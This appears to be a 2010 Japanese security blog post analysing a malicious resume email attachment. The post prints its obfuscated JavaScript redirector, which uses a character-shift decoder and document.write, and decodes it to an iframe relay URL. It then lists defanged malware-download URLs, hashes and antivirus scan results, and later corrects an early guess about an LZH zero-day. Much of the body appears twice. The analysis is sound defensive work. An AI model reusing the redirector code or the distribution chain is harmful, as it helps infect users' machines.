【今日の難読スクリプト】続編 LZHのゼロデイ?
件名
I've attached...I'm enclosing... the latest figures for you.
本文
I have attached the resume.
添付ファイル
77330resume.html
内容 はさっきの奴と一緒
var s="ほにゃらかuuq;00uigsjjtkfotfo/el0jgsbnfgjmf/ktほにゃらか";
m=""; for (i=0; i<s.length; i++) m+=String.fromCharCode(s.charCodeAt(i)-1); document.write(m);
→ s.charCodeAt(i)-1 なのでひとつ前に戻すと。要はHAL→IBMですね。
h丁丁p://thfriisjensen.dk/iframefile.js となります。(A)
誘導スクリプト → 中継点(A)→配布先
つまり、上記ような構造となっており、誘導スクリプトは姿を変えウイルス対策ソフトをかいくぐる、が誘導先(A)はそんなに変化しない。
ちなみに、このAのルート http://thfriisjensen.dk/ はこういうサイトだ。

置き場にされているのだろう。で、今回は以下の内容だった。
h丁丁p://hojikyp.co.cc/ajax/index.php?ajax=do&past=back&catid=168&name=boz&app=post
さっきとは異なる。
さっき→h丁丁p://wiqosah.co.cc/images/?str=get&cat=168&pool=undo&refresh=img&action=boz&app=param
今回→→h丁丁p://hojikyp.co.cc/ajax/index.php?ajax=do&past=back&catid=168&name=boz&app=post
さっきと違うことが分かります。ここにアクセスすると以下のものが落ちてきた。
h丁丁p://hojikyp.co.cc/news/exe.php?x=jar5 → lzhファイル
h丁丁p://hojikyp.co.cc/news/exe.php?x=jjar → lzhファイル →チェック結果
上記二つは同一ファイル。LZHの修復不可能な脆弱性を突くやつだろうか?もしそうだと目茶目茶やばいな。
MD5: 28f2ee30b443160f76166bd15287bb02
Date first seen: 2010-09-22 18:44:54 (UTC)
Date last seen: 2010-09-22 18:44:54 (UTC)
Detection ratio: 4/43
検体を、ジェペットおじさんとピノキオさんら、クジラの中の人に送ってコメントをもらおう。
21:21 追記
クジラの中のジェペット爺さんから連絡があり、LZHのゼロデイではない、中身は単なるexeだと。orz。中身を見ればよかったな。すみませんでした。お騒がせしました。
もしこれが、LZHのゼロデイならば作者は、使用をやめてくれと言っているが、それではだめだ。
LZH系のアプリやDLLをアンインストールしないといけない。
勝手にダウンロードされてしまうからだ。
h丁丁p://hojikyp.co.cc/news/j.php → javaプログラム →チェック結果
MD5: 84f5defe4328d0c31cafb136a3cc5a89
Date first seen: 2010-09-13 10:41:25 (UTC)
Date last seen: 2010-09-23 02:03:33 (UTC)
Detection ratio: 8/42
h丁丁p://hojikyp.co.cc/news/jar5.php → javaプログラム →チェック結果
MD5: 4eea7ae357eecaa94c084083dd4e56da
Date first seen: 2010-09-14 08:04:12 (UTC)
Date last seen: 2010-09-23 08:27:00 (UTC)
Detection ratio: 11/43
h丁丁p://hojikyp.co.cc/news/js.php → javaスクリプト →チェック結果
MD5: b74b43a2fe25a8b253a4310ee827ae77
Date first seen: 2010-05-28 12:53:42 (UTC)
Date last seen: 2010-09-23 08:54:44 (UTC)
Detection ratio: 3/43
I've attached...I'm enclosing... the latest figures for you.
本文
I have attached the resume.
添付ファイル
77330resume.html
内容 はさっきの奴と一緒
var s="ほにゃらかuuq;00uigsjjtkfotfo/el0jgsbnfgjmf/ktほにゃらか";
m=""; for (i=0; i<s.length; i++) m+=String.fromCharCode(s.charCodeAt(i)-1); document.write(m);
→ s.charCodeAt(i)-1 なのでひとつ前に戻すと。要はHAL→IBMですね。
h丁丁p://thfriisjensen.dk/iframefile.js となります。(A)
誘導スクリプト → 中継点(A)→配布先
つまり、上記ような構造となっており、誘導スクリプトは姿を変えウイルス対策ソフトをかいくぐる、が誘導先(A)はそんなに変化しない。
ちなみに、このAのルート http://thfriisjensen.dk/ はこういうサイトだ。

置き場にされているのだろう。で、今回は以下の内容だった。
h丁丁p://hojikyp.co.cc/ajax/index.php?ajax=do&past=back&catid=168&name=boz&app=post
さっきとは異なる。
さっき→h丁丁p://wiqosah.co.cc/images/?str=get&cat=168&pool=undo&refresh=img&action=boz&app=param
今回→→h丁丁p://hojikyp.co.cc/ajax/index.php?ajax=do&past=back&catid=168&name=boz&app=post
さっきと違うことが分かります。ここにアクセスすると以下のものが落ちてきた。
h丁丁p://hojikyp.co.cc/news/exe.php?x=jar5 → lzhファイル
h丁丁p://hojikyp.co.cc/news/exe.php?x=jjar → lzhファイル →チェック結果
上記二つは同一ファイル。LZHの修復不可能な脆弱性を突くやつだろうか?もしそうだと目茶目茶やばいな。
MD5: 28f2ee30b443160f76166bd15287bb02
Date first seen: 2010-09-22 18:44:54 (UTC)
Date last seen: 2010-09-22 18:44:54 (UTC)
Detection ratio: 4/43
検体を、ジェペットおじさんとピノキオさんら、クジラの中の人に送ってコメントをもらおう。
21:21 追記
クジラの中のジェペット爺さんから連絡があり、LZHのゼロデイではない、中身は単なるexeだと。orz。中身を見ればよかったな。すみませんでした。お騒がせしました。
h丁丁p://hojikyp.co.cc/news/j.php → javaプログラム →チェック結果
MD5: 84f5defe4328d0c31cafb136a3cc5a89
Date first seen: 2010-09-13 10:41:25 (UTC)
Date last seen: 2010-09-23 02:03:33 (UTC)
Detection ratio: 8/42
h丁丁p://hojikyp.co.cc/news/jar5.php → javaプログラム →チェック結果
MD5: 4eea7ae357eecaa94c084083dd4e56da
Date first seen: 2010-09-14 08:04:12 (UTC)
Date last seen: 2010-09-23 08:27:00 (UTC)
Detection ratio: 11/43
h丁丁p://hojikyp.co.cc/news/js.php → javaスクリプト →チェック結果
MD5: b74b43a2fe25a8b253a4310ee827ae77
Date first seen: 2010-05-28 12:53:42 (UTC)
Date last seen: 2010-09-23 08:54:44 (UTC)
Detection ratio: 3/43
Antivirus | Version | Last update | Result |
---|---|---|---|
AhnLab-V3 | 2010.09.21.01 | 2010.09.21 | - |
AntiVir | 8.2.4.60 | 2010.09.22 | - |
Antiy-AVL | 2.0.3.7 | 2010.09.22 | - |
Authentium | 5.2.0.5 | 2010.09.22 | - |
Avast | 4.8.1351.0 | 2010.09.22 | - |
Avast5 | 5.0.594.0 | 2010.09.22 | - |
AVG | 9.0.0.851 | 2010.09.22 | - |
BitDefender | 7.2 | 2010.09.22 | - |
CAT-QuickHeal | 11.00 | 2010.09.21 | (Suspicious) - DNAScan |
ClamAV | 0.96.2.0-git | 2010.09.22 | - |
Comodo | 6164 | 2010.09.22 | - |
DrWeb | 5.0.2.03300 | 2010.09.22 | - |
Emsisoft | 5.0.0.37 | 2010.09.22 | - |
eSafe | 7.0.17.0 | 2010.09.21 | - |
eTrust-Vet | 36.1.7870 | 2010.09.22 | - |
F-Prot | 4.6.2.117 | 2010.09.22 | - |
F-Secure | 9.0.15370.0 | 2010.09.22 | - |
Fortinet | 4.1.143.0 | 2010.09.22 | - |
GData | 21 | 2010.09.22 | - |
Ikarus | T3.1.1.88.0 | 2010.09.22 | - |
Jiangmin | 13.0.900 | 2010.09.21 | - |
K7AntiVirus | 9.63.2582 | 2010.09.22 | - |
Kaspersky | 7.0.0.125 | 2010.09.22 | - |
McAfee | 5.400.0.1158 | 2010.09.22 | - |
McAfee-GW-Edition | 2010.1C | 2010.09.22 | - |
Microsoft | 1.6201 | 2010.09.22 | - |
NOD32 | 5471 | 2010.09.22 | - |
Norman | 6.06.06 | 2010.09.22 | - |
nProtect | 2010-09-22.02 | 2010.09.22 | - |
Panda | 10.0.2.7 | 2010.09.22 | - |
PCTools | 7.0.3.5 | 2010.09.22 | HeurEngine.ZeroDayThreat |
Prevx | 3.0 | 2010.09.22 | - |
Rising | 22.66.00.07 | 2010.09.21 | - |
Sophos | 4.57.0 | 2010.09.22 | Mal/EncPk-NS |
Sunbelt | 6911 | 2010.09.22 | - |
SUPERAntiSpyware | 4.40.0.1006 | 2010.09.22 | - |
Symantec | 20101.1.1.7 | 2010.09.22 | Suspicious.AD |
TheHacker | 6.7.0.0.027 | 2010.09.21 | - |
TrendMicro | 9.120.0.1004 | 2010.09.22 | - |
TrendMicro-HouseCall | 9.120.0.1004 | 2010.09.22 | - |
VBA32 | 3.12.14.1 | 2010.09.22 | - |
ViRobot | 2010.8.31.4017 | 2010.09.22 | - |
VirusBuster | 12.65.20.1 | 2010.09.22 | - |
MD5: 28f2ee30b443160f76166bd15287bb02 |
SHA1: 97542cd7ceb7e9d617d56f48edb5e868d6fc5f33 |
SHA256: 548077c0cb4b99b146e0a2cbf5c874b058eaaf417b0a0126199121bb7d19cdb4 |
File size: 169984 bytes |
Scan date: 2010-09-22 18:44:54 (UTC) |
コメント
No title
クジラの中のジェペット爺さんから連絡があり、LZHのゼロデイではない、中身は単なるexeだと。orz。中身を見ればよかったな。すみませんでした。お騒がせしました。
月別アーカイブ
- 2017/06 (1)
- 2015/12 (1)
- 2015/10 (2)
- 2015/09 (1)
- 2014/04 (1)
- 2014/03 (2)
- 2014/01 (1)
- 2013/10 (2)
- 2013/09 (2)
- 2013/04 (1)
- 2013/03 (1)
- 2013/02 (1)
- 2013/01 (2)
- 2012/12 (2)
- 2012/11 (3)
- 2012/10 (2)
- 2012/09 (3)
- 2012/08 (3)
- 2012/07 (7)
- 2012/06 (4)
- 2012/05 (5)
- 2012/04 (5)
- 2012/03 (6)
- 2012/02 (5)
- 2012/01 (1)
- 2011/12 (1)
- 2011/11 (1)
- 2011/10 (4)
- 2011/09 (7)
- 2011/07 (7)
- 2011/06 (5)
- 2011/05 (13)
- 2011/04 (14)
- 2011/03 (20)
- 2011/02 (17)
- 2011/01 (42)
- 2010/12 (32)
- 2010/11 (39)
- 2010/10 (37)
- 2010/09 (42)
- 2010/08 (73)
- 2010/07 (81)
- 2010/06 (45)
- 2010/05 (116)
- 2010/04 (61)
- 2010/03 (60)
- 2010/02 (57)
- 2010/01 (60)
- 2009/12 (42)
- 2009/11 (53)
- 2009/10 (38)
- 2009/09 (35)
- 2009/08 (24)
- 2009/07 (15)
- 2009/06 (31)
- 2009/05 (44)
- 2009/04 (31)
- 2009/03 (33)
- 2009/02 (15)
- 2009/01 (1)
- 2008/09 (2)
- 2008/07 (2)
- 2008/06 (8)
- 2008/05 (1)
- 2008/04 (3)
- 2008/03 (11)
- 2008/02 (21)
- 2008/01 (17)
- 2007/12 (11)
- 2007/11 (8)
- 2007/10 (6)
- 2007/09 (16)
- 2007/08 (4)
- 2007/06 (9)
- 2007/05 (14)
- 2007/04 (11)
- 2007/03 (4)
- 2007/02 (3)
- 2006/12 (3)
- 2006/10 (1)
- 2006/09 (8)
- 2006/08 (2)
- 2006/07 (3)
- 2006/06 (1)
- 2006/05 (13)
- 2006/04 (4)
- 2005/12 (4)
- 2005/11 (1)
- 2005/10 (4)
- 2005/09 (13)
- 2005/08 (8)
- 2005/07 (12)
- 2005/06 (12)
- 2005/05 (1)